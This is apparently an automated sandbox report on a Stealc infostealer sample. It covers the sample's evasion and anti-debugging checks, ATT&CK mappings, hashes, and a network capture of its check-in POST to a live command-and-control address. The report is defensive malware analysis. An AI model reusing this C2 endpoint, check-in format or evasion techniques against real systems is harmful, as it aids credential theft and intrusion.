                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00021160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWn
                Source: file.exe, 00000000.00000002.1800359502.0000000001032000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareQ
                Source: file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1800359502.0000000001004000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36224)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36227)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36246)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36238)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36278)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-36111)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00024610 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00037690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000398E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: gProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00067588 cpuid
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00037D20 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00037B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000379E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00037BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 4600, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (techniques grouped by tactic, in the report's row order; a leading number is the count the report attaches to that technique)

                Reconnaissance
                • Gather Victim Identity Information
                • Credentials
                • Email Addresses
                • Employee Names
                • Gather Victim Network Information
                • Domain Properties
                • DNS
                • Network Trust Dependencies

                Resource Development
                • Acquire Infrastructure
                • Domains
                • DNS Server
                • Virtual Private Server
                • Server
                • Botnet
                • Web Services
                • Serverless

                Initial Access
                • Valid Accounts
                • Default Accounts
                • Domain Accounts
                • Local Accounts
                • Cloud Accounts
                • Replication Through Removable Media
                • External Remote Services
                • Drive-by Compromise

                Execution
                • 2 Command and Scripting Interpreter
                • 12 Native API
                • At
                • Cron
                • Launchd
                • Scheduled Task
                • Systemd Timers
                • Container Orchestration Job

                Persistence
                • 1 DLL Side-Loading
                • Boot or Logon Initialization Scripts
                • Logon Script (Windows)
                • Login Hook
                • Network Logon Script
                • RC Scripts
                • Startup Items
                • Scheduled Task/Job

                Privilege Escalation
                • 11 Process Injection
                • 1 DLL Side-Loading
                • Logon Script (Windows)
                • Login Hook
                • Network Logon Script
                • RC Scripts
                • Startup Items
                • Scheduled Task/Job

                Defense Evasion
                • 1 Masquerading
                • 33 Virtualization/Sandbox Evasion
                • 11 Disable or Modify Tools
                • 11 Process Injection
                • 1 Deobfuscate/Decode Files or Information
                • 3 Obfuscated Files or Information
                • 12 Software Packing
                • 1 DLL Side-Loading

                Credential Access
                • OS Credential Dumping
                • LSASS Memory
                • Security Account Manager
                • NTDS
                • LSA Secrets
                • Cached Domain Credentials
                • DCSync
                • Proc Filesystem

                Discovery
                • 2 System Time Discovery
                • 641 Security Software Discovery
                • 33 Virtualization/Sandbox Evasion
                • 13 Process Discovery
                • 1 Account Discovery
                • 1 System Owner/User Discovery
                • 1 File and Directory Discovery
                • 334 System Information Discovery

                Lateral Movement
                • Remote Services
                • Remote Desktop Protocol
                • SMB/Windows Admin Shares
                • Distributed Component Object Model
                • SSH
                • VNC
                • Windows Remote Management
                • Cloud Services

                Collection
                • 1 Archive Collected Data
                • Data from Removable Media
                • Data from Network Shared Drive
                • Input Capture
                • Keylogging
                • GUI Input Capture
                • Web Portal Capture
                • Credential API Hooking

                Command and Control
                • 2 Encrypted Channel
                • 2 Ingress Tool Transfer
                • 2 Non-Application Layer Protocol
                • 12 Application Layer Protocol
                • Fallback Channels
                • Multiband Communication
                • Commonly Used Port
                • Application Layer Protocol

                Exfiltration
                • Exfiltration Over Other Network Medium
                • Exfiltration Over Bluetooth
                • Automated Exfiltration
                • Traffic Duplication
                • Scheduled Transfer
                • Data Transfer Size Limits
                • Exfiltration Over C2 Channel
                • Exfiltration Over Alternative Protocol

                Impact
                • Abuse Accessibility Features
                • Network Denial of Service
                • Data Encrypted for Impact
                • Data Destruction
                • Data Encrypted for Impact
                • Service Stop
                • Inhibit System Recovery
                • Defacement

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Source | Detection | Scanner | Label
                        file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                        file.exe | 100% | Joe Sandbox ML |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches

                        Source | Detection | Scanner | Label
                        https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe

                        No contacted domains info

                        Name | Malicious | Antivirus Detection | Reputation
                        http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                        http://185.215.113.206/ | true | | unknown

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://185.215.113.206 | file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                        http://185.215.113.206/6c4adf523b719729.phpa- | file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                        https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1545720
                        Start date and time:2024-10-30 21:54:08 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 15s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 129
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe
                        No simulations
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                        185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                        No context
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                        WHOLESALECONNECTIONSNL | Setup.exe | malicious | RedLine | 185.215.113.22
                        WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
                        WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
                        No context
                        No context
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.959339572334429
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:2'146'304 bytes
                        MD5:e7e67024404f23389e4052996e08923a
                        SHA1:7b695a106607d413d657ba1ca50401b03df2fafd
                        SHA256:114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
                        SHA512:ac4a0a2cbeb489e1ab346a79cce1b055dc9387ef20b7c5a3806dd75b00a8558fc199e8ef652b00e63cdb28b7e5c2247100d9112667aeaa69510451409af4158d
                        SSDEEP:49152:R6jsOhFrYVBpNyTTTWI3IDtQW++pAwNbFW:R6jsmWCTTSdCW++pfdFW
                        TLSH:9FA533D296CB413ECA33CD39CF739706F4232625C548FB9A0694B37D6D6A2D48488B76
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xb32000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                        Entrypoint Preview (Instruction)
                        jmp 00007F3D907D9CCAh
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        (no name) | 0x1000 | 0x2e7000 | 0x67600 | b0330617675911947caa0217c0ea28ee | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        (no name) | 0x2ea000 | 0x2a6000 | 0x200 | 560b4de62245c31fcc67346b81f09c36 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        tnleqdlj | 0x590000 | 0x1a1000 | 0x1a0e00 | dbad8512d7ddccff05a2740af37dc6f1 | False | 0.9949933236506746 | data | 7.955054294676287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        afcdkohf | 0x731000 | 0x1000 | 0x600 | b86de67d6582ceb9a646dbcb0b861560 | False | 0.5299479166666666 | data | 4.8176077298690325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant | 0x732000 | 0x3000 | 0x2200 | 10cd804bfb7bdcd8d7d60c7d0a6289d7 | False | 0.06514246323529412 | DOS executable (COM) | 0.687786810131711 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        DLL | Import
                        kernel32.dll | lstrcpy
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-30T21:55:11.459817+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 30, 2024 21:55:10.246751070 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:10.252840996 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                        Oct 30, 2024 21:55:10.252952099 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:10.253108025 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:10.258924007 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                        Oct 30, 2024 21:55:11.168297052 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                        Oct 30, 2024 21:55:11.168361902 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:11.170546055 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:11.176999092 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                        Oct 30, 2024 21:55:11.459585905 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
                        Oct 30, 2024 21:55:11.459816933 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        Oct 30, 2024 21:55:15.068137884 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
                        • 185.215.113.206
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 4600 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 30, 2024 21:55:10.253108025 CET | 90 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.206
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 30, 2024 21:55:11.168297052 CET | 203 | IN | HTTP/1.1 200 OK
                        Date: Wed, 30 Oct 2024 20:55:11 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 30, 2024 21:55:11.170546055 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
                        Host: 185.215.113.206
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Ascii:
                        ------KJKEHIIJJECFHJKECFHD
                        Content-Disposition: form-data; name="hwid"

                        D06FCA4770BC4158135236
                        ------KJKEHIIJJECFHJKECFHD
                        Content-Disposition: form-data; name="build"

                        tale
                        ------KJKEHIIJJECFHJKECFHD--
                        Oct 30, 2024 21:55:11.459585905 CET | 210 | IN | HTTP/1.1 200 OK
                        Date: Wed, 30 Oct 2024 20:55:11 GMT
                        Server: Apache/2.4.41 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=



                        Target ID: 0
                        Start time: 16:55:07
                        Start date: 30/10/2024
                        Path: C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit): true
                        Commandline: "C:\Users\user\Desktop\file.exe"
                        Imagebase: 0x20000
                        File size: 2'146'304 bytes
                        MD5 hash: E7E67024404F23389E4052996E08923A
                        Has elevated privileges: true
                        Has administrator privileges: true
                        Programmed in: C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1756543501.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation: low
                        Has exited: true


                          Execution Graph

                          Execution Coverage: 3.2%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 2.9%
                          Total number of Nodes: 1327
                          Total number of Limit Nodes: 24
37019 24610 2 API calls 37018->37019 37020 23f23 37019->37020 37021 24610 2 API calls 37020->37021 37022 23f3c 37021->37022 37023 24610 2 API calls 37022->37023 37024 23f55 37023->37024 37025 24610 2 API calls 37024->37025 37026 23f6e 37025->37026 37027 24610 2 API calls 37026->37027 37028 23f87 37027->37028 37029 24610 2 API calls 37028->37029 37030 23fa0 37029->37030 37031 24610 2 API calls 37030->37031 37032 23fb9 37031->37032 37033 24610 2 API calls 37032->37033 37034 23fd2 37033->37034 37035 24610 2 API calls 37034->37035 37036 23feb 37035->37036 37037 24610 2 API calls 37036->37037 37038 24004 37037->37038 37039 24610 2 API calls 37038->37039 37040 2401d 37039->37040 37041 24610 2 API calls 37040->37041 37042 24036 37041->37042 37043 24610 2 API calls 37042->37043 37044 2404f 37043->37044 37045 24610 2 API calls 37044->37045 37046 24068 37045->37046 37047 24610 2 API calls 37046->37047 37048 24081 37047->37048 37049 24610 2 API calls 37048->37049 37050 2409a 37049->37050 37051 24610 2 API calls 37050->37051 37052 240b3 37051->37052 37053 24610 2 API calls 37052->37053 37054 240cc 37053->37054 37055 24610 2 API calls 37054->37055 37056 240e5 37055->37056 37057 24610 2 API calls 37056->37057 37058 240fe 37057->37058 37059 24610 2 API calls 37058->37059 37060 24117 37059->37060 37061 24610 2 API calls 37060->37061 37062 24130 37061->37062 37063 24610 2 API calls 37062->37063 37064 24149 37063->37064 37065 24610 2 API calls 37064->37065 37066 24162 37065->37066 37067 24610 2 API calls 37066->37067 37068 2417b 37067->37068 37069 24610 2 API calls 37068->37069 37070 24194 37069->37070 37071 24610 2 API calls 37070->37071 37072 241ad 37071->37072 37073 24610 2 API calls 37072->37073 37074 241c6 37073->37074 37075 24610 2 API calls 37074->37075 37076 241df 37075->37076 37077 24610 2 API calls 37076->37077 37078 241f8 37077->37078 37079 24610 2 API calls 37078->37079 37080 24211 37079->37080 37081 24610 2 API calls 37080->37081 37082 2422a 37081->37082 37083 24610 2 
